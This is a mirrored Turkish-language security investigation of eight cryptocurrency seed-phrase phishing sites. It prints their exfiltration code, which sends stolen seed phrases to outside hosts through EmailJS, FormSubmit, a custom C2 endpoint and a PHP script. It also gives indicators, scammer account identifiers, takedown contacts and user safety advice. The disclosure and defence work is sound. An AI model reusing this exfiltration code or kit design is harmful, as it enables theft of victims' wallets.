Editorial mirrorBrand mentions redacted to public IDs. Hover to inspect. Everything else is theatre.How it works
THE ENABLERS REGISTRYRegistrar accountability archive
Archive LiveRead-only public record · No ads · No tracking
Case file folder with redacted documents and confidential investigation report.
CASE / TR / PHISHING ANATOMY

8 Tohum İfadesi Çalma Yöntemi Tersine Mühendislikle İncelendi

The Enablers Registry·Editorial mirror·/tr/phishing-anatomy

Public record copy. Brand names withheld, public accreditation numbers preserved. If the body below says “we”, that means the original publisher, not this mirror. TER only preserves, redacts, and re-contextualizes.

Kripto Para Kimlik Avının Yapısı:
8 Gerçek Saldırının İncelenmesi

Canlı kimlik avı trafiğini engelledik, 5 adet tohum cümlesi hırsızını tersine mühendislik yoluyla inceledik ve çalınan verilerin izini [REDACTED] botlarına, EmailJS hesaplarına ve “Hizmet Olarak Kimlik Avı” arka uçlarına kadar sürdük.

27 Mart 2026 THE ENABLERS REGISTRY Araştırması Okuma süresi: 18 dakika
Kripto para dolandırıcılığı soruşturmasının analizi
Ele geçirilen kimlik avı trafiğinin canlı analizi, saldırı altyapısının tamamını ortaya koyuyor
8Analiz Edilen Siteler
7Veri Çıkarma Yöntemleri
1,824+Çalınan Kimlik Bilgileri
380+Cüzdan Markaları
$0Saldırganın Maliyeti

Bulgularımız

Her gün binlerce kripto para kullanıcısı, meşru cüzdan hizmetlerinden ayırt edilemeyen kimlik avı siteleri yüzünden paralarını kaybediyor. Peki ne oluyor? arkasında Sahte “Connect Wallet” düğmesi mi? Tohum ifadeniz aslında nereye gidiyor?

5 aktif kimlik avı sitesinden canlı HTTP trafiğini yakaladık, bu sitelerin kaynak kodlarının tamamını indirdik ve her bir veri sızdırma uç noktasını nihai hedefine kadar izledik. Bu araştırma, tohum cümlenizi girmenizi sağlayan sosyal mühendislik hilelerinden, bunu saldırgana gerçek zamanlı olarak ileten [REDACTED] botuna kadar, modern kripto kimlik avının tüm yapısını ortaya koyuyor.

Yasal Uyarı

Bu makalede gösterilen tüm tohum ifadeleri, rastgele oluşturulmuş test verileridir. Bu soruşturma sırasında hiçbir gerçek kimlik bilgisi ele geçirilmemiştir. Tüm siteler, ilgili barındırma sağlayıcılarına ve kötüye kullanım birimlerine bildirilmiştir.

Evrensel Saldırı Şeması

Farklı marka isimleri ve arka uç sistemlerine rağmen, bu 8 kimlik avı sitesinin tamamı şu tamamen aynı psikolojik süreç:

Açılış SayfasıGüven oluşturma
Cüzdan Seçici60–110+ logo
Sahte "Bağlanıyor..."3–5 saniyelik zamanlayıcı
"Bağlantı Başarısız"Her zaman başarısız oluyor
Manuel GirişTohum / Anahtar / Anahtar deposu
Bilgi sızdırmaTG / E-posta / API

Önemli bir gözlem: “Bağlanıyor...” animasyonu her zaman başarısız olması için sabit kodlanmış. 4 numaralı sitenin kaynak kodunda şunu bulduk: const success = false — cüzdan bağlanma denemesi yapılmamaktadır. Tüm bu süreç, yalnızca kurbanları “Manuel Olarak Bağlan” formuna yönlendirmek amacıyla tasarlanmıştır.

Altı aşamalı kripto para dolandırıcılığı saldırı zinciri
Analiz ettiğimiz tüm kimlik avı sitelerinde ortak olarak görülen, 6 adımlı evrensel saldırı zinciri

8 Site: Ayrıntılı Analiz

1
Ağ Katmanı Protokolü
[REDACTED]
CanlıIANA #1910 Pages[REDACTED] Botu + EmailJS

Kimlik sahtekarlığı

Cüzdan doğrulaması için kurgusal bir “merkezi olmayan protokol”. Güvenilirlik sağlamak amacıyla canlı CryptoCompare fiyat göstergelerini ve gerçek blok zinciri gezginlerine (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano) bağlantılar kullanır. Ana sayfada 100'den fazla cüzdan logosu ve 3 adımlı bir "doğrulama" süreci yer almaktadır.

Çift Sızıntı Zinciri

Beşinin en gelişmiş arka ucu — çalınan her kimlik bilgisi buradan gönderilir iki bağımsız kanal aynı anda:

Victim submits seed phrase
  |
  +--> Channel 1: axios POST --> Express.js on [REDACTED]
  |      |
  |      +--> [REDACTED] Bot API --> @metatech2 (instant DM)
  |
  +--> Channel 2: fetch POST --> EmailJS API
         |
         +--> Bestgrace309@gmail.com (email backup)

OSINT Bulguları

GöstergeDeğer
Dolandırıcı E-postasıBestgrace309@gmail.com
[REDACTED] Botu@DewdropsTG_bot (Kimlik: 7567323692)
[REDACTED] Alıcısı@metatech2 (Sohbet Kimliği: 7350941887)
Arka uç[REDACTED]
EmailJS Hizmetiservice_d5qigxs / template_7bqxeaa
Gizli Etki Alanılayerschain.in (CF e-posta gizleme yönteminden)
Gönderilen Mesajlar1.824+ ([REDACTED] mesaj_kimliğinden)
Alan Adı Yaşı2 gün (TLS: 25 Mart 2026)
OPSEC İhlali

Saldırganın e-posta adresi bir JavaScript yorumu içeride config.js: // Bestgrace309@gmail.com. Dağıtımdan önce bunu kaldırmayı unutmuşlar. Ayrıca, [REDACTED] aktarım arka ucu tamamen açık durumda — ne kimlik doğrulama var, ne de hız sınırlaması. IANA #1910’in data-cfemail HTML’deki şifreleme sayesinde, gizli bir e-posta adresi de ortaya çıkardık: support@layerschain.in, Hindistan ve Güney Afrika’daki barındırma altyapısına bağlanarak.

2
AQLA Token'ı Taşıma İşlemi
[REDACTED]
CanlıIANA #1910 PagesStatik Olmayan Formlar

Kimlik sahtekarlığı

Gerçeğin piksel düzeyinde kusursuz bir kopyası Aqualibre (AQLA) token taşıma sayfası. HTML kodunda kaynağı gösteren bir meta veri etiketi bulunmaktadır: data-scrapbook-source="https://token.[REDACTED]/migration", 19 Kasım 2024 tarihli.

Sıfır Kod Yaklaşımı

Bu saldırganın şunlara ihtiyacı vardır: sunucu tarafında hiç kod yok. Form doğrudan şu adrese gönderilir: Statik Olmayan — statik siteler için meşru bir form arka ucu. Her gönderim, dolandırıcının e-posta adresine iletilir. Saldırganın e-posta adresi kaynak kodunda hiçbir zaman görünmez.

<form action="https://forms.[REDACTED]/forms/c78173e2d991...94c3f76">
  <textarea name="phrase"></textarea>
  <input name="private-key" />
  <textarea name="keystore-json"></textarea>
  <input name="password" />
</form>
Maliyet: 0 $

IANA #1910 Pages: ücretsiz. Un-static Forms: ücretsiz. Satın alınan alan adı yok. Kiralanan sunucu yok. Toplam altyapı maliyeti: sıfır dolar.

3
[REDACTED] Yazım Hatası Kapatma
[REDACTED]
Canlı IANA #1910 Pages Statik Olmayan Formlar

Kimlik sahtekarlığı

Alt etki alanı " içerirsafpal" — bir kasıtlı yazım hatası olan [REDACTED], popüler bir donanım cüzdanı. Site, 26 sahte konu kategorisi ile "Blockchain Wallet Rectification" adını kullanıyor. Typed.js’yi kullanarak zincir adlarını (Ethereum, BSC, Polygon...) canlandırıyor ve güvenilirlik yaratmak için bir LiveCoinWatch ticker’ı kullanıyor.

Aynı Kit, Aynı Operatör mü?

Şunu kullanır: tamamen aynı kimlik avı şablonu 2 numaralı site olarak: aynı connect.html, aynı wallets.html 60'tan fazla logoyla, aynı Un-static arka ucu (farklı form kimliği — 6f1b82c3...da9943af). Aynı kit, şunu kuvvetle akla getiriyor: Her iki tesisi de tek bir operatör işletiyor.

Koddaki hatalar: "Privay Policy" (c harfi eksik), "seperated" (doğrusu "separated"), "Kestore" (y harfi eksik). Şifre alanı şunu kullanıyor: type="text" yerine type="password".

4
Flare Network Klonu
[REDACTED]
CanlıIANA #1910 PagesÇift EmailJS (Yedeklilik)

Kimlik sahtekarlığı

'nin neredeyse kusursuz bir kopyası Flare Ağı portal — FTSO ve Data Connector protokollerine sahip gerçek bir Katman-1 EVM blok zinciri. 30’dan fazla ekosistem ortağını, gezinme özelliklerini ve markalaşma unsurlarını taklit eder. Favikonlar bir typosquat adresinden yüklenir: [REDACTED] ("mainnet" kelimesinde bir "n" eksik).

E-postaJS’de Çift Yedekleme

Bunu kullanan tek site iki ayrı EmailJS hesabını aynı anda kaldırılmaya karşı yedeklilik amacıyla:

// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4

// Channel 2: jQuery AJAX direct
$.ajax('https://api.[REDACTED]/api/v1.0/email/send', {
  data: { service_id: 'service_isy47de',
          template_id: 'template_dkk4d1b',
          user_id: 'JsVEgXVcaSTro1etu' }
})

Her hırsızlık vakası için e-posta konusu: "New Wallet Details from Flare".

Bu, Finansman Sağlanmış Bir İşletmedir

HTML'de şunlar yer almaktadır: Google Etiket Yöneticisi (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Lunio PPC korumasıve bir Twitter/X Reklamları pikseli. Saldırgan şu programı çalıştırıyor: ücretli reklamcılık kurbanları kimlik avı sitesine yönlendirmek ve bot tıklamalarını filtrelemek amacıyla. Bu bir hobi değil — analitik araçları ve reklam harcamalarıyla desteklenen, finansmanı sağlanmış bir operasyon.

EmailJS ve ücretli reklamları bir arada barındıran Flare Network kimlik avı sitesi
4. Site: ücretli reklamlar, analiz izleme ve çift veri sızdırma — en profesyonel operasyon
5
COIN NODE / Cüzdan Düzeltmesi (PhaaS)
[REDACTED]
Arka Uç ÇalışmıyorPulseResolve API (PhaaS)

Kimlik sahtekarlığı

Genel bir "COIN NODE" / "Wallet Fix" hizmeti (belirli bir marka yok). Telif hakkı "Wallet Fix 2022" — bu kit şablonu en az 4 yıllık. Görüntüler şu adreste barındırılıyor: [REDACTED] (AWS üzerinde WordPress).

Hizmet Olarak Kimlik Avı

En endişe verici arka uç mimarisi: bir UUID tabanlı çoklu kiracılı API:

POST https://api.[REDACTED]/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data

wallet=[REDACTED]&type=phrase&phrase=buddy+surprise+vapor+river+...

Her dolandırıcıya kendine ait bir UUID uç noktası verilir. Merkezi bir operatör, API’yi yönetir, kampanyaları takip eder ve çalınan paradan bir pay alabilir. Bu, endüstriyel ölçekte kripto hırsızlığı — bir “Possibly phishing-as-a-Service” modeli.

İlgili Altyapı (Çoğunlukla İşlevsiz)

Etki AlanıGörevDurum
[REDACTED]Veri Sızdırma API’siNXDOMAIN
[REDACTED]Favicon barındırma hizmetiNXDOMAIN
[REDACTED]Logo barındırma hizmetiNXDOMAIN
[REDACTED]Görsel CDNCanlı (AWS)
Zombie Ön Uç

Arka uç çalışmıyor, ancak ön uç hâlâ çalışır durumda IANA #1910 Pages üzerinde. Saldırgan yeniden kayıt yaptırırsa [REDACTED], site anında yeniden çalışır hale gelir.

6
Destek Merkezi + Defter Kurtarma
[REDACTED] & [REDACTED]-recovery.support
CanlıIANA #1910 Pages + ReplitÖzel C2 API'siBIP39 Otomatik Tamamlama

Kimlik sahtekarlığı

A iki yönlü operasyon: şu adresteki genel bir "Destek Merkezi" [REDACTED] 15 sahte ürün kategorisi ve 39 cüzdan markası ile, ayrıca bir Piksel düzeyinde kusursuz [REDACTED] kayıt süreci klonu 'de [REDACTED]-recovery.support Replit üzerinde barındırılan — cihaz modeli seçimi, PIN ayarı ve 24 kelimelik tohum cümlesi tablosu ile birlikte gerçek BIP39 otomatik tamamlama.

Anti-Scanner C2 Arka Ucu

Cüzdan destek sayfası, çalınan verileri şu adrese gönderir: [REDACTED]/log — IANA #1910 arkasında çalışan özel bir nginx/Ubuntu C2. Arka uç tüm GET isteklerini kasıtlı olarak reddediyor (522 zaman aşımı hatası veriyor), yalnızca POST isteklerine yanıt veriyor. Bu, URL tarayıcılarının, Google Safe Browsing tarayıcılarının ve GET isteğiyle uç noktaya ping gönderen güvenlik araştırmacılarının hiçbir şey görememesi anlamına gelir — C2 sunucusu devre dışı gibi görünür.

// config.js — C2 config exposed in plaintext
const config = {
  serverURL: "https://api.[REDACTED]",
  allowedWallets: ["[REDACTED]","solfare","[REDACTED]","[REDACTED]",
    "[REDACTED]","[REDACTED]","[REDACTED]","VARA Provisional License","sui","backpack",
    "tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;

// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
  fetch(serverURL + "/log", {
    method: "POST",
    headers: {"Content-Type": "application/json"},
    body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
  })
}

[REDACTED] klonu, Replit platformu üzerinde ayrı bir Express.js arka ucu çalıştırıyor: POST /api/recovery-phrase toplama {deviceId, pin, phrase}. Sonuç olarak 400 {"error":"Invalid data provided"} hatalı biçimlendirilmiş girdi durumunda — arka ucun canlı ve aktif olarak doğrulama aşamasında çalınan veriler.

OSINT Bulguları

GöstergeDeğer
Ön Uç (Cüzdan)[REDACTED]
Ön Uç ([REDACTED])[REDACTED]-recovery.support (34.111.179.208)
C2 Arka Uç [REDACTED] → nginx/1.24.0 Ubuntu
C2 IP'leri104.21.60.163 / 172.67.198.35 (IANA #1910)
Replit Doğrulamaa43d3852-5304-47af-a61b-f0f6f3912736
Kayıt Sorumlusu[REDACTED] ([REDACTED]-recovery.support)
Yerleştirildi9 Ocak 2026 (Last-Modified başlığı)
Teknoloji Yığını React + Vite + Tailwind v4.1 + Framer Motion
En Yüksek Kullanıcı Deneyimi Doğruluğu

466 KB boyutundaki JS paketi şunları içerir: tam BIP39 kelime listesi gerçek zamanlı otomatik tamamlama özelliği için “passphrase” terimine 67, “mnemonic” terimine ise 39 kez atıfta bulunulmuştur. [REDACTED] klonu, kurbanları gerçek bir [REDACTED] cihazıyla tamamen aynı kurulum sürecinden geçiriyor — bu, tüm soruşturma boyunca karşılaşılan en inandırıcı kimlik avı sayfasıdır. Bu apiKey yapılandırmadaki bu alan şunu öneriyor: çoklu kiracılı PhaaS mimarisi.

7
Merkezi Olmayan Lansman Platformu
[REDACTED]
CanlıIANA #1910 PagesFormSubmit.co

Kimlik sahtekarlığı

Aşağıdakileri içeren genel bir "Merkezi Olmayan Lansman Platformu": 21 yem kategorisi (Staking, Geçiş, KYC, Hediye Kampanyası, Ödülleri Al, Varlık Kurtarma, Ön Satış, NFT Basımı, Kilitli Hesaplar...) ve 70'den fazla cüzdan markası — karşılaştığımız en kapsamlı cüzdan listelerinden biri. “Sychronize” (burada ‘n’ harfi eksik) şeklindeki bariz yazım hatası, bunun sahte olduğunu ele veriyor.

FormSubmit Pipeline

Kullanım Alanları FormSubmit.co — meşru bir “formdan e-postaya” hizmeti. Uç nokta hash’i a2cf4131f1a5d39453c7c183df96f86f dolandırıcının e-posta adresinin MD5 değeridir. Gmail, Yahoo, Hotmail, ProtonMail, Yandex ve [REDACTED]’da yüzlerce e-posta şablonunu brute force yöntemiyle denedik — eşleşme yok. Dolandırıcı, nadir görülen veya rastgele oluşturulmuş bir e-posta adresi kullanır.

// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
    url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
    method: "POST",
    dataType: "JSON",
    data: {
        dappWord: seedPhrase,       // THE STOLEN SEED PHRASE
        dappName: walletName,       // Which wallet was selected
        linkName: "DAPP DECENTRALIZED"  // Campaign identifier
    }
});

OSINT Bulguları

GöstergeDeğer
Etki Alanı[REDACTED]
Form Gönderme Hash'ia2cf4131f1a5d39453c7c183df96f86f
Kampanya KimliğiDAPP MERKEZİ OLMAYAN
FontAwesome Kitibdc3291137 (kit no. 112310842, ücretsiz v6.7.2)
jQuery3.2.1 ve 3.5.1 sürümleri aynı anda yüklendi
BootstrapCSS 5.2.2 + JS 5.3.0-alpha1 (uyumsuzluk)
İki adet taşıma kolu

FontAwesome Kiti bdc3291137 — FontAwesome, bu kit kimliğinin ardındaki hesap sahibini tespit edebilir. Kampanya etiketi DAPP DECENTRALIZED aynı FormSubmit hash değerini kullanan diğer kimlik avı sitelerinde de görünebilir. Tohum cümlesini çaldıktan sonra, bir sahte QR kodu ve rastgele 7 karakterlik referans kodu şu mesaj görüntüleniyor: "Benzersiz referans kodunuzla yöneticiye başvurun" — soruşturma yapmak yerine mağdurları bekletmek.

8
R2 Bucket + Ev Bilgisayarında PHP
pub-519769e9eb634616b1746c2018641d56.r2.dev
ÖlüIANA #1910 R2PHP + DDNS

Kimlik sahtekarlığı

Bilinmiyor — hem ön uç hem de arka uç çevrimdışı durumda. Yük yapısına göre, bu bir kripto cüzdan tohum cümlesi hırsızlığı saldırısıydı. Bu IANA #1910 R2 genel depolama alanı (nesne depolama, Pages değil) bir iyi belgelenmiş bir kimlik avı yöntemi Netskope tarafından 5.000'den fazla zararlı sayfa tespit edildi ve trafiğin 61 kat arttığı bildirildi.

Script Kiddie Kurulumu

En temel işlem bu koleksiyonda. Tohum ifadeleri gönderilir kelime kelime ücretsiz Dinamik DNS üzerinden ev bilgisayarı veya VPS üzerinde çalışan bir PHP betiğine:

POST [REDACTED]/fuc.php
Content-Type: application/x-www-form-urlencoded

pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
    +%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
    +%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
    +%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access

OSINT Bulguları

GöstergeDeğer
Ön Uç pub-519769e9eb634616b1746c2018641d56.r2.dev [ÇEVRİMDIŞI]
Arka uç [REDACTED] [NXDOMAIN]
R2 Kova Kimliği519769e9eb634616b1746c2018641d56
DDNS Sağlayıcısı [REDACTED] / [REDACTED] (Cincinnati, OH)
DNS NSns10–[REDACTED]
Kullanıcı adımercifuljigga4real123
OSINT kullanıcı adı: mercifuljigga4real123

"Merciful" + "jigga" (Jay-Z'nin takma adı) + "4real" + "123" — hip-hop kültürüne yakınlığını yansıtan, son derece kişisel bir kullanıcı adı. Bulunamadı herhangi bir indekslenmiş platformda: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch veya [REDACTED]. Muhtemelen [REDACTED], [REDACTED] veya oyun platformlarında bu isimle ya da buna yakın varyasyonlarla aktiftir. Dosya adı fuc.php tutamağın cüretkar tarzına uyuyor.

Tohum İfadenizi Çalmanın 7 Yöntemi

Dört kripto para dolandırıcılığı yoluyla veri sızdırma yönteminin karşılaştırılması
8 oltalama sitesinde kullanılan yedi farklı veri sızdırma mimarisi
YöntemSitelerNasıl Çalışır?HızMaliyet
[REDACTED] Botu#1 [REDACTED] üzerindeki Express.js, Bot API’ye yönlendirir. Dolandırıcı, kimlik bilgilerini içeren anlık bir özel mesaj alır. Gerçek zamanlı$0
EmailJS#1, #4 İstemci tarafındaki JavaScript, verileri doğrudan EmailJS API’ye gönderir; bu API de verileri dolandırıcının e-posta adresine iletir. ~1 dakika$0
Statik Olmayan Formlar#2, #3 Gönderimleri e-posta yoluyla ileten meşru bir form hizmetine yapılan standart HTML form POST isteği. ~1 dakika$0
FormSubmit.co#7 jQuery AJAX ile FormSubmit.co'ya gönderim. E-posta adresi MD5 hash ile gizlenmiştir. Kampanya, "DAPP DECENTRALIZED" etiketiyle işaretlenmiştir. ~1 dakika$0
Özel C2 API'si#6 [REDACTED], IANA #1910’in arkasındaki nginx/Express API’sine istek gönderir. GET isteklerini keser (522) tarayıcılardan kaçmak için. Yalnızca POST isteklerine yanıt verir. Gerçek zamanlı~5 $/ay
PHP + DDNS#8 Ücretsiz Dinamik DNS ([REDACTED]) aracılığıyla ev bilgisayarında çalışan bir PHP betiği. Tohum cümlesi kelime kelime gönderiliyor. Gerçek zamanlı$0
PhaaS API'si#5 UUID tabanlı çoklu kiracılı API. Merkezi operatör arka ucu yönetir, dolandırıcılar ise uç noktaları kiralar. Gerçek zamanlıBilinmiyor

Her Kimlik Avı Sitesini Ortaya Çıkaran 7 Uyarı İşareti

Eğer görürseniz herhangi bir Bunlardan herhangi biriyle karşılaşırsanız, sekmeyi derhal kapatın:

1. “Bağlantı Başarısız” mesajı her zaman sahte

Gerçek cüzdan bağlantıları, WalletConnect protokolünü veya tarayıcı uzantılarını kullanır. Bu bağlantılarda, tohum cümlenizi girmenizi isteyen bir “Bağlantı Başarısız” hatası asla görüntülenmez.

2. 50–110+ cüzdan logosu, tek bir yer

Her cüzdan simgesi aynı forma yönlendirir. Gerçek bir hizmet, her bir cüzdanın kendi SDK’sını entegre ederdi.

3. Gönderme işleminden sonra "Hata" mesajı

Gönderimden sonra ortaya çıkan sahte “503 Hatası” veya “Bilinmeyen Hata” mesajı kasıtlıdır. Verileriniz çoktan çalınmıştır — bu hata, sizi başka bir cüzdanla tekrar denemeye yönlendirmek için bir tuzaktır.

4. .pages.dev üzerinde barındırılıyor

Bu 5 sitenin tamamı IANA #1910 Pages’ın ücretsiz kademesini kötüye kullanıyor. Kimlik doğrulaması gerekmiyor. IANA #1910 Pages’da kimlik avı amaçlı kötüye kullanım, 2025 yılında %198 arttı.

5. Üç sekme: İfade / Özel Anahtar / Anahtar Deposu

Hiçbir meşru hizmet bu üç kimlik bilgisi türünün hepsine ihtiyaç duymaz. Bu üç sekmeli form, bir kimlik avı kitinin tipik bir özelliğidir.

6. Blok zinciri ile herhangi bir etkileşim yok

Bu sitelerin hiçbiri yüklenmiyor ethers.js, web3.js, ya da herhangi bir RPC çağrısı yapamazlar. Bunlar, dApp gibi görünen saf HTML formlarıdır.

7. Sıfır maliyetli altyapı

Ücretsiz barındırma + ücretsiz form hizmetleri + ücretsiz mesajlaşma = 0 dolara tam donanımlı bir kimlik avı operasyonu. Sitenin gerçek bir alan adı yoksa, şüphelenin.

Tam IOC Tablosu

Güvenlik ekipleri, tehdit istihbarat platformları ve kötüye kullanım bildirimcileri için:

Alan Adları ve Altyapı

Etki AlanıTürDurum
[REDACTED]Kimlik avı ön ucuCanlı
[REDACTED]Kimlik avı ön ucuCanlı
[REDACTED]Kimlik avı ön ucuCanlı
[REDACTED]Kimlik avı ön ucuCanlı
[REDACTED]Kimlik avı ön ucuCanlı
[REDACTED]TG röle arka ucuCanlı
[REDACTED]Yazım hatası içeren alan adlarıBilinmiyor
layerschain.inİlgili alan adıDNS çalışmıyor
[REDACTED]PhaaS arka ucuNXDOMAIN
[REDACTED]Varlık barındırma hizmetiNXDOMAIN
[REDACTED]Logo barındırma hizmetiNXDOMAIN
[REDACTED]Görsel CDNCanlı (AWS)
[REDACTED]Kimlik avı ön ucuCanlı
[REDACTED]-recovery.support[REDACTED] kimlik avı (Replit)Canlı
[REDACTED]C2 arka ucu (nginx/Ubuntu)Canlı
[REDACTED]Kök etki alanı404
[REDACTED]Kimlik avı ön ucuCanlı
pub-519769e9eb634616b1746c2018641d56.r2.devKimlik avı (R2 grubu)Çevrimdışı
[REDACTED]PHP arka ucu (DDNS)NXDOMAIN

Hesaplar ve Kimlik Bilgileri

TürDeğerSite
E-postaBestgrace309@gmail.com#1
E-posta (gizli)support@layerschain.in#1
[REDACTED] Botu@DewdropsTG_bot (7567323692)#1
[REDACTED] Kullanıcısı@metatech2 (7350941887)#1
EmailJS #1service_d5qigxs / I-7q0Bs-ilK3rFcWj#1
EmailJS #2service_6dt5h1k / Sza6lhzA9hKHrm1k4#4
EmailJS #3service_isy47de / JsVEgXVcaSTro1etu#4
Statik Olmayan Formc78173e2d991...94c3f76#2
Statik Olmayan Form6f1b82c3ce55...da9943af#3
PhaaS UUID'sia26db20c-1dc4-4208-a60a-c2c3b22c02ef#5
GTMGTM-WX2D2TR#4
MS Clarityj4bllybjkp#4
Render Örneğirndr-id: ed83576e-b1b3-4c82#1
Replit Doğrulamaa43d3852-5304-47af-a61b-f0f6f3912736#6
Form Gönderme MD5a2cf4131f1a5d39453c7c183df96f86f#7
Kampanya EtiketiDAPP MERKEZİ OLMAYAN#7
FontAwesome Kitibdc3291137 (set no. 112310842)#7
R2 Kova Kimliği519769e9eb634616b1746c2018641d56#8
Kullanıcı Adı/DDNSmercifuljigga4real123#8

Kripto Para Kimlik Avı Olaylarını Nereye Bildirmeli?

Kripto para dolandırıcılık sitelerini nereye bildirmeli — çok yönlü kaldırma operasyonu
Maksimum kaldırma hızı elde etmek için barındırma, arka uç hizmetleri ve mesajlaşma platformlarını aynı anda hedeflemek
HizmetNeler Bildirilmelidir?Nasıl
IANA #19107 adet .pages.dev + 1 adet R2 depolama alanıabuse.IANA #1910.com
Google Safe BrowsingTüm kimlik avı URL’leriOltalama Girişimini Bildir
PhishTankTopluluk engelleme listesine ait tüm URL’ler[REDACTED]
EmailJS3 adet kötüye kullanılmış hesap (yukarıdaki hizmet kimlikleri)abuse@emailjs.com
Statik Olmayan2 form uç noktası[REDACTED] üzerinden iletişime geçin
[REDACTED][REDACTED] aktarım arka ucuKötüye kullanım bildirim formunu gönder
[REDACTED]@DewdropsTG_bot + @metatech2[REDACTED].org/support
Google (Gmail)Bestgrace309@gmail.comGoogle'a kötüye kullanım bildirimi
Twitter/X4 numaralı siteyi tanıtan reklam hesabıX reklamları kötüye kullanım bildirimi
FormSubmit.coHash a2cf4131... (#7)Form Gönderme – Kötüye Kullanım Bildirim Formu
Replit[REDACTED]-recovery.support (#6)Replit kötüye kullanım bildirimi
[REDACTED][REDACTED]-recovery.support için kayıt sorumlusu[REDACTED] kötüye kullanım
DNSExit[REDACTED][REDACTED] kötüye kullanım
FontAwesomeKit bdc3291137 (#7)FontAwesome'ın kötüye kullanımı
ChainabuseTüm kimlik avı kampanyaları[REDACTED]

Kendinizi Nasıl Koruyabilirsiniz?

Altın Kural

Hiçbir meşru hizmet, sizden bir web sitesine tohum cümlenizi girmenizi istemez. Tohum ifadeleri yalnızca cüzdanın kurtarılması sırasında resmi cüzdan yazılımına girilir — asla üçüncü taraf "doğrulama", "senkronizasyon" veya "kurtarma" web sitelerine girilmez.

Herhangi bir cüzdanı bağlamadan önce:

  • URL’nin resmi alan adıyla eşleştiğini doğrulayın. SSL sertifikasının ayrıntılarını kontrol edin.
  • Gerçek WalletConnect, bir QR kodu veya derin bağlantı kullanır — asla tohum cümlesi biçimini kullanmaz.
  • Eğer "bağlantı kurulamadı" mesajı çıkarsa ve sizden kimlik bilgilerinizi manuel olarak girmeniz istenirse — bu bir kimlik avıdır.
  • Şüpheli URL’leri şu adresten kontrol edin: PhishTank veya VirusTotal etkileşime geçmeden önce.
  • Bir donanım cüzdanı kullanın — bu cüzdan, her işlem için fiziksel onay gerektirir.
  • Resmi URL’leri yer imlerine ekleyin. Reklamlardaki, özel mesajlardaki veya sosyal medyadaki bağlantılara asla tıklamayın.

Kripto Kimlik Avı Sınıflandırması

Tohum cümlesi hırsızları sadece bir kategoridir. İşte kripto para dolandırıcılığının genel tablosu — her bir tür hakkında ayrıntılı analizler ekleyeceğiz.

Tohum İfadesi Çalıcıları
Sizi kurtarma ifadesini girmeye yönlendiren sahte “Connect Wallet” sayfaları. Bu makalenin odak noktası: 5 gerçek örneğin ayrıntılı analizi.
Yukarıda Ele Alınan Konular
Onay Kaçırma
[REDACTED] üzerinden sınırsız token onayı talep eden kötü niyetli dApp’ler. Onay verildikten sonra saldırgan, tohum cümlenize ihtiyaç duymadan cüzdanınızı boşaltır.
Yakında
Ice Possibly phishing (Permit2)
EIP-2612’nin gaz gerektirmeyen izinlerini istismar eder. Kurban, token aktarım haklarını veren zincir dışı bir mesaja imza atar — varlıkların boşaltılmasına kadar zincir üzerinde herhangi bir onay görünmez.
Yakında
Sahte Airdrop İddiaları
Kötü niyetli bir akıllı sözleşme aracılığıyla “talep edilmesi” gereken sahte token dağıtımları. Bu talep işlemi, aslında gerçek tokenlerinizi başka bir yere aktarır.
Yakında
Pano Ele Geçiriciler
Panonuzu izleyen ve kopyaladığınız cüzdan adreslerini, yapıştırmadan önce sessizce saldırganın adresiyle değiştiren kötü amaçlı yazılım.
Yakında
Tozlanma + Zehirlenme
Birbirine benzeyen adreslerden yapılan küçük işlemler, işlem geçmişinizi kirletir. Mağdur, bir sonraki transferi için işlem geçmişinden sahte adresi kopyalar.
Yakında

Rahatsız Edici Gerçek

Bir kripto para dolandırıcılığı operasyonunu kurmanın maliyeti $0 ve sürer 30 dakikadan az. Ücretsiz barındırma, ücretsiz form hizmetleri, ücretsiz mesajlaşma botları. 1 numaralı sitenin arkasındaki saldırgan, halihazırda şu sitelerden kullanıcı bilgilerini ele geçirmiştir: 1.824'ten fazla mağdur. 4 numaralı tesis şu anda çalışır durumda ücretli reklamcılık büyüklüğüne göre. Bu amatörlerin işi değil — bu bir endüstri. Tek savunma yolu farkındalıktır.

Mücadelemize Destek Olun

THE ENABLERS REGISTRY, kripto para dolandırıcılığı sitelerini gerçek zamanlı olarak takip eder ve bildirir. Şüpheli bir siteyle karşılaştıysanız, bunu bize bildirin — durumu inceleyeceğiz ve sitenin kaldırılması için çalışacağız.

İlgili Soruşturmalar

Soruşturma
[REDACTED]’un Sonu: IANA #1479, Bir M Hırsızını Korumak İçin Yalan Söyledi
10 yıllık Monero hırsızlığı. 3 kayıt şirketi olaya müdahil oldu. IANA #1479 7 yalan uydurdu.
Derinlemesine İnceleme
Kripto Hırsızlığı Ağları: Altyapı Ortaya Çıktı
“Hizmet Olarak Süzgeç” işletmeleri altyapı ve operatörleri nasıl paylaşıyor?
Panelin Açığa Çıkması
[REDACTED] Kimlik Avı Paneli: Tam Yönetici Erişimi
[REDACTED]’a yönelik bir kimlik avı operasyonunun yönetici paneline erişim sağladık.
Altyapı
Dolandırıcılık Altyapısı Ortaya Çıktı: Ortak Arka Uçlar
Dolandırıcılık operasyonları sunucuları, şablonları ve ödeme akışlarını nasıl paylaşır?

Continue browsing the ledger

This page is the editorial mirror. Brand names are redacted to public IANA / business identifiers. Use the index to navigate other case files.

Open registrar ledger → All briefings